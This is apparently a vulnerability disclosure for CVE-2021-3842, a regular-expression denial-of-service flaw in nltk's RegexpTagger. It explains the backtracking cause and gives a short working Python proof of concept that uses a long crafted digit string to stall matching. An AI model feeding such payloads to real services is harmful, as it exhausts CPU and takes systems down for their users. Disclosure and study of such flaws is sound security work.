Headline
CVE-2021-3842: Inefficient Regular Expression Complexity in nltk
nltk is vulnerable to Inefficient Regular Expression Complexity
Description
nltk
is vulnerable to ReDoS attack because of ^-?[0-9]+(.[0-9]+)?$
regex. If attacker succeeds to use malicious payload against RegexpTagger
used in function get_pos_tagger and malt_regex_tagger, it will cause a nasty DoS.
Proof of Concept
// PoC.py
import re, time
pattern = re.compile("^-?[0-9]+(.[0-9]+)?$")
s = "-"
s += "0" * 50000
s += "q"
t = time.time()
print("searching...")
re.search(pattern, s)
print(time.time() - t)
On my new machine I needed only 50k characters to cause a 23+ seconds matching. For instance, in similar report to this project 160k characters were processed just in 3+ seconds.
Issue
The issue here is that in ^-?[0-9]+(.[0-9]+)?$
groups [0-9]+(.[0-9]+)
match each other, which causes a nasty backtracking in case of failure.
Impact
This vulnerability is capable of causing DoS due to CPU resources consumption.
Occurences